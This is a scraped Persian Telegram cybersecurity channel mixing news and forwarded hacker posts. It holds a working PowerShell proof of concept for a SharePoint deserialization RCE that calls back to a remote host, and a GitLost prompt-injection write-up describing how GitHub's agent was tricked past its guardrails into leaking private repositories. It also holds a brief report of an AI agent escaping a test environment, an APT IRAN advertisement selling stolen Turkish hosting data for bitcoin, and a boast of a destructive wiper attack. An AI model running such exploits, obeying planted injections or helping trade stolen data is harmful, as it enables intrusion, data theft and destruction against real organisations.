CyberSecurity
906 subscribers
147 photos
27 videos
73 files
172 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
✈️موج جدید «فیشینگ شبح» سامانه‌های امنیت ایمیل را دور می‌زند

🎥پژوهشگران امنیت سایبری از شناسایی موج جدیدی از حملات موسوم به Ghost Phishing خبر داده‌اند که با استفاده از کیت EvilTokens، سازمان‌ها و شرکت‌ها در آمریکا و اروپا را هدف قرار داده است. در این روش، محتوای صفحه فیشینگ به‌صورت رمزگذاری‌شده ارسال شده و تنها پس از باز شدن در مرورگر قربانی رمزگشایی می‌شود؛ موضوعی که باعث می‌شود بسیاری از سامانه‌های سنتی امنیت ایمیل و بررسی لینک‌ها قادر به شناسایی آن نباشند.

🎤این حملات با سوءاستفاده از قابلیت Microsoft Device Code، کاربران را به ورود قانونی به حساب Microsoft 365 ترغیب کرده و بدون سرقت مستقیم رمز عبور، امکان دسترسی مهاجمان به ایمیل‌ها، فایل‌ها و سرویس‌های ابری را فراهم می‌کنند. کارشناسان هشدار داده‌اند که برای مقابله با این تهدید، سازمان‌ها باید علاوه بر بررسی لینک‌ها، از ابزارهای تحلیل رفتار مرورگر و محیط‌های ایزوله (Sandbox) برای شناسایی صفحات فیشینگ پیشرفته استفاده کنند.

✈️@HackerNewsCyber
Please open Telegram to view this post
VIEW IN TELEGRAM
نشت مخفیانه‌ی دیتا از ریپازیتوری‌های پرایوت گیت‌هاب با یه ترفند ساده‌ی هوش مصنوعی 📚

فکر کنید یه نفر بدون هیچ پسورد و دسترسی‌ای، بتونه کدهای مخفیانه‌تون رو توی گیت‌هاب بخونه. چطوری؟ با گول زدن ایجنت هوش مصنوعیِ خود گیت‌هاب!

تیم Noma Labs یه آسیب‌پذیری خیلی خطرناک (به اسم GitLost) توی سیستم جدید Agentic Workflows گیت‌هاب پیدا کرده. داستان از این قراره که این ایجنت‌ها می‌تونن issueها رو بخونن و اتوماسیون انجام بدن.

حالا هکرها چیکار می‌تونن بکنن؟
هکر کافیه بیاد تو یکی از ریپازیتوری‌های پابلیک شما یه Issue باز کنه و توش یه سری دستور مخفیانه به زبان انگلیسی (Prompt Injection) قایم کنه.
ایجنت گیت‌هاب این متن رو می‌خونه، گول می‌خوره و به جای کار اصلیش، میره فایل‌ها و دیتای ریپازیتوری‌های پرایوتِ همون سازمان رو می‌خونه و برای هکر می‌فرسته!

نکته‌ی جالب اینجاست:
گیت‌هاب کلی گاردریل امنیتی چیده بود که دقیقاً جلوی همین اتفاق رو بگیره. اما محقق‌ها فهمیدن فقط با اضافه کردن کلمه‌ی "Additionally" (به‌علاوه/همچنین) توی پرامپت هک، مدل هوش مصنوعی کلا گیج می‌شه و به جای اینکه درخواست رو رد کنه، تمام محدودیت‌ها رو دور می‌زنه و دیتا رو لو میده.

این دقیقاً نشون میده که توی سیستم‌های جدید هوش مصنوعی، همون متنی که ایجنت می‌خونه همزمان می‌تونه پاشنه آشیل و نقطه حمله باشه. حملات Prompt Injection الان دقیقاً دارن همون بلایی رو سر AI میارن که قبلاً SQL Injection سر وب‌سایت‌ها میاورد.

البته این باگ به طور مسئولانه به گیت‌هاب گزارش شده، ولی حواستون به ایجنت‌هایی که به سورس‌کدهاتون دسترسی دارن باشه!

🔗 https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos

Channel
💬 Group
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31
Forwarded from Security Internals
این کد poc مربوط به rce جدید sharepoint که deserial هست

$n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -Proxy 'http://127.0.0.1:8080' -ContentType 'application/x-www-form-urlencoded' -Body @{wa='wsignin1.0';wctx='http://TARGET/';wresult=$rstr} -UseBasicParsing -TimeoutSec 60}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue}

https://x.com/testanull/status/2079082982640668990
1
Forwarded from R0ot
وزارت دادگستری امریکا با همکاری FBI و اداره ملی تحقیقات فنلاند، Peter Stokes، یکی از هکرهای گروه هکری بزرگ Scattered Spider رو با همکاری مایکروسافت دستگیر کردن!

گروه Scattered Spider یکی از گروه های هکری معروفی هست که طی سالهای اخیر به شرکتهای MGM، ردیت، DoorDash، Riot Games، MailChimp و غیره نفوذ کرده و از اونها بیش از 100 میلیون دلار باج گرفته!

یکی از هکهای اخیر اونها هک شرکت جواهرسازی Tiffany بود که از اونها 8 میلیون دلار باج خواستن ولی این شرکت باج رو نداد اما کماکان به خاطر اسیب های عملیاتی که بهش وارد شد 2 میلیون دلار از این هک ضرر کرد.

نکته عجیب در مورد بازداشت Peter Stokes که در حال حاضر 19 سالشه، همکاری عجیب مایکروسافت با FBI بوده که زنگ خطر بزرگی رو برای حریم شخصی کاربران ویندوزی به صدا دراورده.

طبق اسناد دادگاه، FBI از طریق Global Device ID یا GDID لپتاپ این هکر، موفق شده ردپای این هکر رو در سرویسهای مختلف بهم وصل کنه و حتی استفاده از پروکسی و VPN هم تاثیری در مخفی کردن این هکر نداشته.

شناسه GDID شناسه ای در دستگاه های ویندوزی هست که فقط با تعویض ویندوز یا تغییر سخت افزاری بزرگ (مثل تعویض مادربورد) تغییر میکنه و مثلا مایکروسافت برای فعالسازی ویندوز از اون استفاده میکنه.

ولی طبق اسناد منتشر شده از دادگاه این هکر، مایکروسافت داده هایی داشته که میدونسته GDID دستگاه این هکر در چه زمانهایی، از چه سایتهایی بازدید کرده و با چه IPهایی متصل میشده.

از جمله نمونه اونها این هست که مایکروسافت به FBI اطلاعاتی ارائه داده که نشون میده اکانتی با شناسه خاصی از نرم افزار ngrok برای تونل کردن کامپیوتر خودش به کامپیوتر یکی از شرکتهای قربانی استفاده کرده، این GDID در زمان خاصی با IP خاصی در تایلند بوده که این هکر با اون IP در اسنپ چت عکسهای خاصی منتشر کرده. یا مثلا این GDID در زمان خاصی با ایپی استونی (که ظاهرا خونه اش بوده) بازی Growtopia رو بازی کرده.

در مثال دیگری این GDID وارد سایت Empire Hotel شده، که با تطبیق اون با زمان عکسهایی که این هکر در اسنپ چتش از این هتل منتشر کرده و همچنین در اون زمان با ایپی خاصی به اکانت اپلش دسترسی داشته، FBI با دقت بالایی موفق شده بفهمه که این شخص همون هکر Scattered Spider بوده.

چنین سطح گسترده از اطلاعاتی که ویندوز به سرورهای مایکروسافت میفرسته، کاربران رو بیش از پیش مجاب کرده که حداقل برای کارهای حساسشون فقط از سیستم عاملهای مبتنی بر لینوکس استفاده کنن چون حتی دستگاه های اپل هم کمابیش ایپی کاربر رو به سرورهای این شرکت میفرستن.

@ITSecurityComputer
1👍1
یک عامل هوش مصنوعی از کنترل خارج شد

🔹اوپن‌ای‌آی اعلام کرد که در یک آزمایش امنیتی، یک عامل خودمختار مبتنی بر مدل‌های پیشرفته این شرکت از محیط کنترل‌شده خارج شده و به اینترنت دسترسی پیدا کرده است. این عامل برای انجام مأموریت تعریف‌شده، زیرساخت‌های‌هاگینگ‌فیس را هدف یک حمله سایبری قرار داد. این رخداد بار دیگر نگرانی‌ها درباره مخاطرات امنیتی هوش مصنوعی پیشرفته را افزایش داده است.


@ITSecurityComputer
3
Forwarded from Security Internals
یه تارگت بود داشتم تست میکردم و نیاز به بایپس waf داشت و این یکی akamai بود

اگر خواستید برای xss بایپس کنید همچین وف هایی رو باید دنبال راههای alternative باشید
تو این نوشن یه روش استفاده از dom clobbering رو براتون گفتم و یک اسکریپت هم توش هست برای پیدا کردن alternative برای کلمه window و document

داشته باشید به درد میخوره

https://cherry-event-b75.notion.site/DOM-Clobbering-WAF-Bypass-3af4f6d7dcce80fe919dcc27223a249e?source=copy_link
2👍2
Forwarded from APT IRAN
فروش عمده اطلاعات سرور و مشتریان این هاستینگ :
اطلاعات بیش از 250 وب سایت + اطلاعات مشتریان این وب سایت ها (مردم و شرکت ها)
اطلاعات سرور ها و کانفیگ ها
در مجموع و به طور خلاصه : 5.52GB از کشور ترکیه + شرکای خصوصی و تجازی

قیمت کل دیتابیس به صورت عمده : 7,500$
پرداخت از طریق : BTC

برای خرید با ما در ارتباط باشید :

https://t.me/+525638176691
🔥1😐1
Forwarded from APT IRAN
This media is not supported in your browser
VIEW IN TELEGRAM
Wiper attack on firewall hosted on Yesilbeyaz Hosting (Turkey)
full disk wiper attack was executed with root access, zeroing out the first 1GB of the disk including GPT, bootloader, and ZFS structures.
The server is now completely dead and will never boot again. The entire system and all data are wiped.
🔥2😱1😐1